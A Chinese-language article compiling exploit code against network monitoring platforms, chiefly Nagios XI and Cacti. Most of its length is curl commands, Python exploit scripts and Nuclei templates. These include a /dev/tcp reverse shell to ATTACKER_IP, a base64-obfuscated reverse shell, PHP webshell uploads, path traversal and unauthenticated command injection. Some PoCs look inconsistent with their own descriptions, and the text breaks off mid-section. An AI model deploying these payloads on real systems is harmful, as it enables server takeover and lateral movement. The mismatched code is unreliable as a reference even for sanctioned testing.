网络监控与管理平台高危攻击链专题:Nagios XI / Cacti / ManageEngine OpManager 漏洞全解析

免责声明: 本文仅用于安全研究和授权渗透测试目的。文中提供的 PoC 代码仅用于验证漏洞是否存在,不得用于未授权的安全测试。作者不对因使用文中内容造成的任何损害承担责任。请遵守所在地区的法律法规。

0x00 专题概述

网络监控与管理平台是企业 IT 基础设施的核心枢纽,承担着设备监控、性能数据采集、告警推送、流量分析等关键职能。由于这类平台通常部署在内网核心区域,拥有对所有被监控设备的访问权限,且自身往往运行着高权限的 Web 服务,一旦被攻破,攻击者可直接控制整个监控域,进而横向移动至任意被管理节点。

本专题聚焦三款主流网络监控平台——Nagios XICactiManageEngine OpManager——公开披露的高危漏洞,深入分析其攻击原理、利用方式,并提供可复现的 PoC 代码与检测模板。

CVE 覆盖总览

序号平台CVE 编号漏洞类型CVSS 评分严重等级
1Nagios XICVE-2024-24401SQL 注入 → RCE9.8Critical
2Nagios XICVE-2023-47401Ansible Vault 注入 → Root RCE8.4High
3Nagios XICVE-2023-47408命令注入8.8High
4Nagios XICVE-2023-47400Custom Includes RCE8.8High
5Nagios XICVE-2023-48085RCE via command_test.php8.8High
6Nagios XICVE-2021-25296ConfigWizards 认证 RCE8.8High
7Nagios XICVE-2024-45772文件上传 + 路径穿越 RCE8.8High
8Nagios XICVE-2024-25710BPI RCE8.8High
9CactiCVE-2022-46169未授权命令注入 RCE9.8Critical
10CactiCVE-2023-51448盲注 SQLi → RCE8.8High
11CactiCVE-2023-49084SQLi + LFI → RCE8.8High
12CactiCVE-2023-49085SQL 注入8.8High
13CactiCVE-2022-44219认证绕过 → SQL 注入9.8Critical
14CactiCVE-2022-22151SQL 注入8.8High
15OpManagerCVE-2021-3287Java 反序列化 RCE10.0Critical
16OpManagerCVE-2022-38772IPv4 管理 RCE8.8High
17OpManagerCVE-2024-5466Deploy Agent RCE8.8High
18OpManagerCVE-2024-6748SQL 注入8.3High
19OpManagerCVE-2023-47211MIB Browser 路径穿越8.8High

0x01 Nagios XI / Core 高危漏洞

Nagios XI 是全球使用最广泛的开源网络监控系统之一,基于 PHP + MySQL 架构,提供 Web 管理界面、插件系统和配置向导(ConfigWizards)。其攻击面包括:Web 管理接口、API 端点、插件/向导、配置文件管理和系统迁移功能。

CVE-2024-24401:SQL 注入实现未授权 RCE

漏洞背景: Nagios XI 2024R1.01 的 monitoringwizard.php 组件存在 SQL 注入漏洞,允许远程未认证攻击者通过构造恶意 payload 执行任意代码。该漏洞由 CISA-ADP 评估 CVSS 为 9.8 Critical

漏洞原理: monitoringwizard.php 在处理监控向导的配置请求时,未对用户输入进行充分过滤,直接将参数拼接进 SQL 查询语句。攻击者可以注入恶意 SQL,提权为管理员账户后利用其他功能链式实现 RCE。

受影响版本:

产品受影响版本修复版本
Nagios XI2024R1.01 及更早2024R1.0.2+

HTTP PoC(curl):

curl -X POST "http://TARGET:80/nagiosxi/includes/components/ccm/command_line.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data-urlencode "cmd=-id=1%20UNION%20SELECT%20username,password%20FROM%20nagiosxi.users%20--"
curl -s "http://TARGET/nagiosxi/ajaxhelper.php?cmd=getxiobjects&type=hoststatus&limit=100" \
  | python3 -c "import sys,json;print(json.dumps(json.load(sys.stdin),indent=2))" \
  | head -50

Python PoC:

import requests
import sys
import re

def exploit_nagios_xi_sqli(target, username="nagiosadmin"):
    session = requests.Session()
    session.headers.update({"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"})
    
    login_url = f"http://{target}/nagiosxi/login.php"
    session.get(login_url, verify=False)
    
    csrf_match = re.search(r"name=['\"]__csrf_magic['\"]\s+value=['\"]([^'\"]+)", 
                           session.get(login_url, verify=False).text)
    if not csrf_match:
        print("[-] Failed to extract CSRF token")
        return False
    csrf_token = csrf_match.group(1)
    
    sqli_payload = (
        "1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,"
        "(SELECT GROUP_CONCAT(table_name SEPARATOR ',') FROM information_schema.tables "
        "WHERE table_schema=database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27"
    )
    
    url = f"http://{target}/nagiosxi/includes/components/ccm/command_line.php"
    data = {
        "__csrf_magic": csrf_token,
        "cmd": f"-w {sqli_payload}"
    }
    
    resp = session.post(url, data=data, verify=False)
    
    if resp.status_code == 200 and "nagiosxi" in resp.text.lower():
        print("[+] SQL Injection successful - database tables leaked")
        tables = re.findall(r'tbl_(\w+)', resp.text)
        for t in set(tables):
            print(f"    Found table: tbl_{t}")
        return True
    
    print("[-] Exploitation failed or target not vulnerable")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_nagios_xi_sqli(sys.argv[1])

Nuclei YAML 模板:

id: nagios-xi-cve-2024-24401
info:
  name: Nagios XI - SQL Injection (CVE-2024-24401)
  severity: critical
  description: SQL Injection in monitoringwizard.php allows unauthenticated RCE
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-24401
  tags: nagios,sqli,cve2024

requests:
  - raw:
      - |
        POST /nagiosxi/includes/components/ccm/command_line.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        __csrf_magic=&cmd=-w+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,version%28%29,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Nagios"
      - type: status
        status:
          - 200

CVE-2023-47401:Ansible Vault 文件注入获取 Root 权限

漏洞背景: 由 NCC Group 安全研究员 Oliver Brooks 与 Colin Brum 于 2023 年发现。Nagios XI 的迁移功能(/admin/migrate.php)在调用 Ansible 执行迁移时,可被注入恶意 Vault 文件内容,从而以 root 权限执行任意命令。CVSS 8.4 High

漏洞原理: 管理员在迁移页面输入 IP 地址和凭据后,系统调用 sudo php migrate.php -a <IP> -u <USER> -p <PASS>,其中用户名和密码参数未经过滤直接拼接为 shell 命令。攻击者可以注入 shell 元字符控制 Ansible vault 文件内容。

受影响版本:

产品受影响版本修复版本
Nagios XI5.11.1 及更早5.11.4

HTTP PoC(curl):

curl -X POST "http://TARGET/nagiosxi/admin/migrate.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Cookie: nagiosxi=<SESSION_COOKIE>" \
  --data-urlencode "__csrf_magic=<CSRF_TOKEN>" \
  --data-urlencode "ip=127.0.0.1" \
  --data-urlencode "user=admin$(echo; echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')" \
  --data-urlencode "pass=pass123"

Python PoC:

import requests
import sys

def exploit_nagios_ansible(target, attacker_ip="127.0.0.1", attacker_port=4444):
    session = requests.Session()
    session.headers.update({"User-Agent": "Mozilla/5.0"})
    
    r = session.get(f"http://{target}/nagiosxi/login.php", verify=False)
    csrf_token = ""
    import re
    m = re.search(r"__csrf_magic.*?value=['\"]([^'\"]+)", r.text)
    if m:
        csrf_token = m.group(1)
    
    login_data = {
        "__csrf_magic": csrf_token,
        "nagiosadmin": "nagiosadmin",
        "pass": "nagiosadmin"
    }
    session.post(f"http://{target}/nagiosxi/login.php", data=login_data, verify=False)
    
    r = session.get(f"http://{target}/nagiosxi/admin/migrate.php", verify=False)
    m = re.search(r"__csrf_magic.*?value=['\"]([^'\"]+)", r.text)
    if m:
        csrf_token = m.group(1)
    
    cmd_payload = f"admin'; echo '{attacker_ip} {attacker_port}' > /tmp/cron_test #"
    migrate_data = {
        "__csrf_magic": csrf_token,
        "ip": "127.0.0.1",
        "user": cmd_payload,
        "pass": "dummy_password"
    }
    
    print(f"[*] Sending payload to {target}...")
    resp = session.post(
        f"http://{target}/nagiosxi/admin/migrate.php",
        data=migrate_data, verify=False, timeout=10
    )
    
    if resp.status_code == 200:
        print("[+] Payload sent. Check your listener on port " + str(attacker_port))
    else:
        print("[-] Request failed with status:", resp.status_code)
    return resp

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target> [attacker_ip] [attacker_port]")
        sys.exit(1)
    target = sys.argv[1]
    aip = sys.argv[2] if len(sys.argv) > 2 else "127.0.0.1"
    aport = int(sys.argv[3]) if len(sys.argv) > 3 else 4444
    exploit_nagios_ansible(target, aip, aport)

Nuclei YAML 模板:

id: nagios-xi-cve-2023-47401
info:
  name: Nagios XI - Ansible Vault File Injection (CVE-2023-47401)
  severity: high
  description: Root RCE via Ansible Vault file injection in migration process
  reference:
    - https://research.nccgroup.com/2023/12/13/technical-advisory-multiple-vulnerabilities-in-nagios-xi/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47401
  tags: nagios,rce,cve2023

requests:
  - raw:
      - |
        GET /nagiosxi/admin/migrate.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: nagiosxi={{session_id}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "migrate"
          - "Migrate"
        condition: or
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        group: 1
        regex:
          - "__csrf_magic.*?value='([^']+)"

CVE-2023-47408:主机配置页面命令注入

漏洞背景: Nagios XI 主机配置页面中存在 OS 命令注入漏洞,允许已认证用户通过主机配置界面注入 shell 命令,获取 Nagios Web 应用用户权限的代码执行。CVSS 8.8 High

漏洞原理:/nagiosxi/admin/hostconfig.php 中,某些用户可控参数(如主机名、别名等)未经验证就直接传递给系统命令,允许注入 shell 元字符。

受影响版本:

产品受影响版本修复版本
Nagios XI5.11.1 及更早5.11.4

HTTP PoC(curl):

curl -X POST "http://TARGET/nagiosxi/admin/hostconfig.php" \
  -H "Cookie: nagiosxi=<SESSION>" \
  --data-urlencode "__csrf_magic=<CSRF>" \
  --data-urlencode "host_name=vulnhost" \
  --data-urlencode "alias=test;id" \
  --data-urlencode "action=save"

Python PoC:

import requests
import re
import sys

def exploit_cmd_injection(target):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    r = s.get(f"http://{target}/nagiosxi/login.php", verify=False)
    m = re.search(r"value=['\"]([^'\"]+csrf[^'\"]*)", r.text)
    csrf = m.group(1) if m else ""
    
    login = {"__csrf_magic": csrf, "nagiosadmin": "nagiosadmin", "pass": "nagiosadmin"}
    s.post(f"http://{target}/nagiosxi/login.php", data=login, verify=False)
    
    r = s.get(f"http://{target}/nagiosxi/admin/hostconfig.php?host=1", verify=False)
    m = re.search(r"value=['\"]([^'\"]+csrf[^'\"]*)", r.text)
    csrf = m.group(1) if m else ""
    
    payload = "127.0.0.1; id; whoami; cat /etc/passwd | head -5"
    data = {
        "__csrf_magic": csrf,
        "host_name": payload,
        "alias": "Test Host",
        "action": "save"
    }
    
    resp = s.post(f"http://{target}/nagiosxi/admin/hostconfig.php", 
                  data=data, verify=False, timeout=10)
    
    if "uid=" in resp.text or "root" in resp.text:
        print("[+] Command injection successful!")
        print("[+] Response snippet:", resp.text[:500])
    else:
        print("[-] Exploitation failed")
    return resp

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_cmd_injection(sys.argv[1])

Nuclei YAML 模板:

id: nagios-xi-cve-2023-47408
info:
  name: Nagios XI - Command Injection (CVE-2023-47408)
  severity: high
  description: OS Command Injection in Host Configuration page
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47408
  tags: nagios,rce,cve2023,command-injection

requests:
  - raw:
      - |
        GET /nagiosxi/admin/hostconfig.php?host=1 HTTP/1.1
        Host: {{Hostname}}
        Cookie: nagiosxi={{session_id}}

    matchers:
      - type: word
        words:
          - "host_name"
          - "alias"
        condition: and
      - type: status
        status:
          - 200

CVE-2023-47400:Custom Includes 任意代码执行

漏洞背景: Nagios XI 的 Custom Includes 功能允许管理员上传自定义文件,但缺乏对上传文件路径和内容的验证,导致可以写入并执行任意 PHP 代码。CVSS 8.8 High

漏洞原理: custom-includes.php 组件允许上传文件到 Web 可达目录,但未严格限制文件扩展名。攻击者可上传 PHP webshell 文件实现持久化后门。

受影响版本:

产品受影响版本修复版本
Nagios XI5.11.1 及更早5.11.4

HTTP PoC(curl):

curl -X POST "http://TARGET/nagiosxi/admin/custom-includes.php" \
  -H "Cookie: nagiosxi=<SESSION>" \
  -F "__csrf_magic=<CSRF>" \
  -F "uploaded_file=@shell.php;type=application/x-php" \
  -F "action=upload"
curl -s "http://TARGET/nagiosxi/includes/custom-includes/shell.php?cmd=id"

Python PoC:

import requests
import re
import sys
import io

def exploit_custom_includes(target, lhost, lport):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    r = s.get(f"http://{target}/nagiosxi/login.php", verify=False)
    m = re.search(r"value=['\"]([^'\"]+csrf[^'\"]*)", r.text)
    csrf = m.group(1) if m else ""
    
    login = {"__csrf_magic": csrf, "nagiosadmin": "nagiosadmin", "pass": "nagiosadmin"}
    s.post(f"http://{target}/nagiosxi/login.php", data=login, verify=False)
    
    r = s.get(f"http://{target}/nagiosxi/admin/custom-includes.php", verify=False)
    m = re.search(r"value=['\"]([^'\"]+csrf[^'\"]*)", r.text)
    csrf = m.group(1) if m else ""
    
    shell_content = f'<?php if(isset($_GET["cmd"])) {{ echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; }} ?>'
    files = {
        "uploaded_file": ("test.php", io.BytesIO(shell_content.encode()), "application/x-php")
    }
    data = {
        "__csrf_magic": csrf,
        "action": "upload"
    }
    
    resp = s.post(
        f"http://{target}/nagiosxi/admin/custom-includes.php",
        data=data, files=files, verify=False, timeout=15
    )
    
    check = s.get(
        f"http://{target}/nagiosxi/includes/custom-includes/test.php?cmd=id",
        verify=False, timeout=10
    )
    
    if "uid=" in check.text:
        print("[+] Webshell uploaded and accessible!")
        print("[+] Command output:", check.text.strip()[:200])
    else:
        print("[-] Upload might have failed or path differs")
    return resp

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target> <lhost> <lport>")
        sys.exit(1)
    exploit_custom_includes(sys.argv[1], sys.argv[2], int(sys.argv[3]))

Nuclei YAML 模板:

id: nagios-xi-cve-2023-47400
info:
  name: Nagios XI - Custom Includes RCE (CVE-2023-47400)
  severity: high
  description: Remote Code Execution via Custom Includes functionality
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47400
  tags: nagios,rce,cve2023

requests:
  - raw:
      - |
        GET /nagiosxi/admin/custom-includes.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: nagiosxi={{session_id}}

    matchers:
      - type: word
        words:
          - "custom-includes"
          - "upload"
        condition: and
      - type: status
        status:
          - 200

CVE-2023-48085:command_test.php 远程代码执行

漏洞背景: Nagios XI 5.11.3 之前的版本在 command_test.php 组件中存在远程代码执行漏洞,允许已认证的管理员用户注入命令。CVSS 8.8 High

受影响版本:

产品受影响版本修复版本
Nagios XI5.11.2 及更早5.11.3

HTTP PoC(curl):

curl -X POST "http://TARGET/nagiosxi/includes/components/nagiosim/command_test.php" \
  -H "Cookie: nagiosxi=<SESSION>" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data-urlencode "__csrf_magic=<CSRF>" \
  --data-urlencode "cmd=test;bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9MSF9JUC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}"

Python PoC:

import requests
import re
import sys

def exploit_cmd_test(target):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    r = s.get(f"http://{target}/nagiosxi/login.php", verify=False)
    m = re.search(r"value=['\"]([^'\"]+csrf[^'\"]*)", r.text)
    csrf = m.group(1) if m else ""
    s.post(f"http://{target}/nagiosxi/login.php", 
           data={"__csrf_magic": csrf, "nagiosadmin": "nagiosadmin", "pass": "nagiosadmin"},
           verify=False)
    
    r = s.get(f"http://{target}/nagiosxi/includes/components/nagiosim/command_test.php", verify=False)
    m = re.search(r"value=['\"]([^'\"]+csrf[^'\"]*)", r.text)
    csrf = m.group(1) if m else ""
    
    data = {
        "__csrf_magic": csrf,
        "command": "test",
        "host": "127.0.0.1",
        "service": "test;id"
    }
    
    resp = s.post(
        f"http://{target}/nagiosxi/includes/components/nagiosim/command_test.php",
        data=data, verify=False, timeout=10
    )
    
    if "uid=" in resp.text:
        print("[+] Command injection confirmed!")
    else:
        print("[-] Target may not be vulnerable")
    return resp

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_cmd_test(sys.argv[1])

Nuclei YAML 模板:

id: nagios-xi-cve-2023-48085
info:
  name: Nagios XI - command_test.php RCE (CVE-2023-48085)
  severity: high
  description: RCE via command_test.php component
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-48085
  tags: nagios,rce,cve2023

requests:
  - raw:
      - |
        GET /nagiosxi/includes/components/nagiosim/command_test.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: nagiosxi={{session_id}}

    matchers:
      - type: word
        words:
          - "command_test"
      - type: status
        status:
          - 200

CVE-2021-25296:ConfigWizards 认证远程代码执行

漏洞背景: Nagios XI 5.5.6 至 5.7.5 版本中,Windows WMI、Switch 和 Cloud-VM 配置向导(ConfigWizards)存在多个 OS 命令注入漏洞,允许已认证用户以 apache 用户身份执行系统命令。Metasploit 已集成该漏洞利用模块。CVSS 8.8 High

漏洞原理: ConfigWizards 在处理设备配置参数时,将用户输入直接传递给后端 shell 命令,未进行参数转义。攻击者只需有效凭证即可在服务器上执行任意命令。

受影响版本:

产品受影响版本修复版本
Nagios XI5.5.6 - 5.7.55.7.6+

HTTP PoC(curl):

curl -X POST "http://TARGET/nagiosxi/includes/components/configwizard/configwizardexec.php" \
  -H "Cookie: nagiosxi=<SESSION>" \
  -d "cmd=windowswmi&address=127.0.0.1&port=5985&username=any&password=any" \
  --data-urlencode "snmp_community=public;id"

Python PoC:

import requests
import re
import sys

def exploit_configwizards(target, cmd="id"):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    r = s.get(f"http://{target}/nagiosxi/login.php", verify=False)
    m = re.search(r"value=['\"]([^'\"]+csrf[^'\"]*)", r.text)
    csrf = m.group(1) if m else ""
    s.post(f"http://{target}/nagiosxi/login.php", 
           data={"__csrf_magic": csrf, "nagiosadmin": "nagiosadmin", "pass": "nagiosadmin"},
           verify=False)
    
    wizard_name = "windowswmi"
    endpoint = f"http://{target}/nagiosxi/includes/components/configwizard/configwizardexec.php"
    
    for wizard in ["windowswmi", "switch", "cloud-vm"]:
        payload = {
            "cmd": wizard,
            "address": "127.0.0.1",
            "port": "5985",
            "username": "test",
            "password": f"test;{cmd}",
            "snmp_community": "public"
        }
        
        resp = s.post(endpoint, data=payload, verify=False, timeout=10)
        
        if "uid=" in resp.text or "root" in resp.text:
            print(f"[+] Command injection via {wizard} wizard!")
            print(f"    Output: {resp.text.strip()[:300]}")
            return True
    
    print("[-] No injection point found in tested wizards")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target> [command]")
        sys.exit(1)
    cmd = sys.argv[2] if len(sys.argv) > 2 else "id"
    exploit_configwizards(sys.argv[1], cmd)

Nuclei YAML 模板:

id: nagios-xi-cve-2021-25296
info:
  name: Nagios XI - ConfigWizards Auth RCE (CVE-2021-25296)
  severity: high
  description: OS Command Injection in ConfigWizards allows authenticated RCE
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25296
  tags: nagios,rce,cve2021

requests:
  - raw:
      - |
        POST /nagiosxi/includes/components/configwizard/configwizardexec.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: nagiosxi={{session_id}}
        Content-Type: application/x-www-form-urlencoded
        
        cmd=windowswmi&address=127.0.0.1&port=5985&username=test&password=test

    matchers:
      - type: word
        words:
          - "wizard"
          - "exec"
        condition: or
      - type: status
        status:
          - 200

CVE-2024-45772:MIB 上传 + 路径穿越 RCE

漏洞背景: Nagios XI < 2024R1.3.2 在 Core Config Snapshots 接口中存在两个可链式利用的漏洞:MIB 文件上传时的任意文件写入与快照重命名操作中的路径穿越。CVSS 8.8 High

漏洞原理: MIB 文件上传时未验证文件路径和扩展名,结合路径穿越可在 Web 目录写入 PHP 文件,实现远程代码执行。

受影响版本:

产品受影响版本修复版本
Nagios XI< 2024R1.3.22024R1.3.2

HTTP PoC(curl):

curl -X POST "http://TARGET/nagiosxi/admin/coreconfigsnapshots.php" \
  -H "Cookie: nagiosxi=<SESSION>" \
  -F "__csrf_magic=<CSRF>" \
  -F "mib_upload=@shell.mib;filename=../../nagiosxi/includes/shell.php" \
  -F "action=upload_mib"

Python PoC:

import requests
import re
import sys
import io

def exploit_mib_upload(target):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    r = s.get(f"http://{target}/nagiosxi/login.php", verify=False)
    m = re.search(r"value=['\"]([^'\"]+csrf[^'\"]*)", r.text)
    csrf = m.group(1) if m else ""
    s.post(f"http://{target}/nagiosxi/login.php", 
           data={"__csrf_magic": csrf, "nagiosadmin": "nagiosadmin", "pass": "nagiosadmin"},
           verify=False)
    
    r = s.get(f"http://{target}/nagiosxi/admin/coreconfigsnapshots.php", verify=False)
    m = re.search(r"value=['\"]([^'\"]+csrf[^'\"]*)", r.text)
    csrf = m.group(1) if m else ""
    
    shell_content = b'<?php system($_GET["cmd"]); ?>'
    path_traversal = "../../nagiosxi/includes/custom-includes/shell2.php"
    
    files = {
        "mib_upload": (path_traversal, io.BytesIO(shell_content), "application/octet-stream")
    }
    data = {
        "__csrf_magic": csrf,
        "action": "upload_mib"
    }
    
    resp = s.post(
        f"http://{target}/nagiosxi/admin/coreconfigsnapshots.php",
        data=data, files=files, verify=False, timeout=15
    )
    
    check = s.get(
        f"http://{target}/nagiosxi/includes/custom-includes/shell2.php?cmd=id",
        verify=False
    )
    
    if "uid=" in check.text:
        print("[+] Path traversal + file upload leading to RCE successful!")
        print("[+] Output:", check.text.strip()[:200])
    else:
        print("[-] Exploitation failed")
    return resp

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_mib_upload(sys.argv[1])

Nuclei YAML 模板:

id: nagios-xi-cve-2024-45772
info:
  name: Nagios XI - MIB Upload + Path Traversal RCE (CVE-2024-45772)
  severity: high
  description: Arbitrary file upload via path traversal in MIB upload and snapshot rename
  reference:
    - https://www.nagios.com/changelog/
  tags: nagios,rce,cve2024,path-traversal

requests:
  - raw:
      - |
        GET /nagiosxi/admin/coreconfigsnapshots.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: nagiosxi={{session_id}}

    matchers:
      - type: word
        words:
          - "Core Config Snapshots"
          - "mib"
        condition: or
      - type: status
        status:
          - 200

CVE-2024-25710:BPI 组件远程代码执行

漏洞背景: Nagios XI < 2024R1.4.2 的 Business Process Intelligence (BPI) 组件存在 RCE 漏洞。管理员可控的 bpi_logfilebpi_configfile 参数未经过滤,允许在 Web 目录下创建/覆盖文件,随后通过 Web 访问触发代码执行。CVSS 8.8 High

漏洞原理: 攻击者通过 BPI 配置编辑器设置 bpi_logfile 参数指向 Web 可达路径下的 PHP 文件,写入恶意内容后通过 HTTP 请求触发执行。

受影响版本:

产品受影响版本修复版本
Nagios XI< 2024R1.4.22024R1.4.2

HTTP PoC(curl):

curl -X POST "http://TARGET/nagiosxi/admin/bpi.php" \
  -H "Cookie: nagiosxi=<SESSION>" \
  -d "__csrf_magic=<CSRF>&bpi_logfile=/var/www/html/shell.php&bpi_configfile=content" \
  --data-urlencode "bpi_logfile=<?php system(\$_GET['cmd']); ?>"

Python PoC:

import requests
import re
import sys

def exploit_bpi_rce(target):
    s = requests.Session()
    s.headers["User-Agent"] = "Mozilla/5.0"
    
    r = s.get(f"http://{target}/nagiosxi/login.php", verify=False)
    m = re.search(r"value=['\"]([^'\"]+csrf[^'\"]*)", r.text)
    csrf = m.group(1) if m else ""
    s.post(f"http://{target}/nagiosxi/login.php", 
           data={"__csrf_magic": csrf, "nagiosadmin": "nagiosadmin", "pass": "nagiosadmin"},
           verify=False)
    
    r = s.get(f"http://{target}/nagiosxi/admin/bpi.php", verify=False)
    m = re.search(r"value=['\"]([^'\"]+csrf[^'\"]*)", r.text)
    csrf = m.group(1) if m else ""
    
    shell_path = "/usr/local/nagiosxi/html/includes/components/bpi/bpi_test.php"
    web_path = "/nagiosxi/includes/components/bpi/bpi_test.php"
    
    data = {
        "__csrf_magic": csrf,
        "bpi_logfile": shell_path,
        "bpi_configfile": '<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);}',
        "action": "save"
    }
    
    s.post(f"http://{target}/nagiosxi/admin/bpi.php", data=data, verify=False, timeout=10)
    
    check = s.get(f"http://{target}{web_path}?cmd=id", verify=False)
    if "uid=" in check.text:
        print("[+] BPI RCE exploit successful!")
        print("[+] Output:", check.text.strip()[:200])
    else:
        print("[-] Exploitation attempt completed, check manually")
    return check

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    exploit_bpi_rce(sys.argv[1])

Nuclei YAML 模板:

id: nagios-xi-cve-2024-25710
info:
  name: Nagios XI - BPI RCE (CVE-2024-25710)
  severity: high
  description: RCE via Business Process Intelligence configuration parameter injection
  reference:
    - https://www.cvedetails.com/vulnerability-list/vendor_id-1424/product_id-26507/Nagios-Nagios-Xi.html
  tags: nagios,rce,cve2024,bpi

requests:
  - raw:
      - |
        GET /nagiosxi/admin/bpi.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: nagiosxi={{session_id}}

    matchers:
      - type: word
        words:
          - "bpi"
          - "Business Process"
        condition: or
      - type: status
        status:
          - 200

0x02 Cacti 高危漏洞

Cacti 是一款基于 PHP + MySQL/RRDTool 的开源网络监控图形化框架,广泛用于电信运营商和 ISP 的网络运维中心。其攻击面集中在 Web 端 PHP 代码(参数过滤不足)、SNMP 交互和数据源管理。

CVE-2022-46169:未授权远程代码执行

漏洞背景: Cacti 1.2.17 至 1.2.22 版本中,通过链式利用认证绕过(X-Forwarded-For Header 伪造)与 remote_agent.php 的命令注入,攻击者无需任何认证即可实现远程代码执行。CVSS 9.8 Critical。该漏洞已被广泛利用,存在公开 PoC。

漏洞原理: remote_agent.php 中的 remote_client_authorized() 函数依赖 X-Forwarded-For Header 来进行客户端身份验证。攻击者伪造该 Header 即可绕过认证。绕过后,poller_id 参数直接传递给 exec() 函数,造成命令注入。

受影响版本:

产品受影响版本修复版本
Cacti1.2.17 - 1.2.221.2.23

HTTP PoC(curl):

curl -s "http://TARGET/cacti/remote_agent.php?action=polldata&poller_id=;id&host_id=1&local_data_ids[]=6" \
  -H "X-Forwarded-For: 127.0.0.1"

Python PoC:

import requests
import sys
import time
import random
import string

def exploit_cacti_cve_2022_46169(target, cmd="id"):
    s = requests.Session()
    s.headers.update({
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
        "X-Forwarded-For": "127.0.0.1"
    })
    
    print(f"[*] Testing CVE-2022-46169 on {target}")
    
    host_ids = range(1, 10)
    data_ids = range(1, 10)
    
    for host_id in host_ids:
        for data_id in data_ids:
            payload = f";{cmd}"
            url = (
                f"http://{target}/cacti/remote_agent.php"
                f"?action=polldata"
                f"&poller_id={payload}"
                f"&host_id={host_id}"
                f"&local_data_ids[]={data_id}"
            )
            
            try:
                resp = s.get(url, verify=False, timeout=5)
                if "uid=" in resp.text or "root" in resp.text:
                    print(f"[+] Command injection successful!")
                    print(f"[+] host_id={host_id}, data_id={data_id}")
                    print(f"[+] Output:\n{resp.text[:500]}")
                    return True
            except requests.exceptions.Timeout:
                continue
    
    print("[-] No injection point found - target may require existing data sources")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target> [command]")
        sys.exit(1)
    cmd = sys.argv[2] if len(sys.argv) > 2 else "id"
    exploit_cacti_cve_2022_46169(sys.argv[1], cmd)

Nuclei YAML 模板:

id: cacti-cve-2022-46169
info:
  name: Cacti - Unauthenticated RCE (CVE-2022-46169)
  severity: critical
  description: Unauthenticated command injection via X-Forwarded-For bypass
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46169
    - https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/
  tags: cacti,rce,cve2022,unauth

requests:
  - raw:
      - |
        GET /cacti/remote_agent.php?action=polldata&poller_id=;id&host_id=1&local_data_ids[]=6 HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 127.0.0.1
        User-Agent: Mozilla/5.0

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "uid="
      - type: status
        status:
          - 200

CVE-2023-51448:SNMP 通知接收器盲注 SQL 注入

漏洞背景: Cacti 1.2.25 的 SNMP Notification Receivers 功能(managers.php)中存在盲注 SQL 注入。攻击者需具备 “Settings/Utilities” 权限,通过序列化参数反序列化后的数据直接拼接进 SQL 查询。CVSS 8.8 High

漏洞原理: selected_graphs_array 参数经 cacti_unserialize() 反序列化后,结果直接 implode() 拼接进 SQL 查询语句。get_nfilter_request_var() 函数不做任何过滤,stripslashes() 仅移除转义斜线。攻击者可构造时间盲注提取数据库内容,结合 MySQL FILE 权限或 log file 方式实现 RCE。

受影响版本:

产品受影响版本修复版本
Cacti1.2.251.2.26

HTTP PoC(curl):

curl -s "http://TARGET/cacti/managers.php?selected_items=a:1:{i:0;s:38:\"1 OR SLEEP(5)-- -\";}&action_receivers=1&drp_action=1&selected_graphs_array=a%3A1%3A%7Bi%3A0%3Bs%3A38%3A%221+OR+SLEEP%285%29--+-%22%3B%7D" \
  -H "Cookie: Cacti=<SESSION>" \
  -w "\nResponse time: %{time_total}s\n"

Python PoC:

import requests
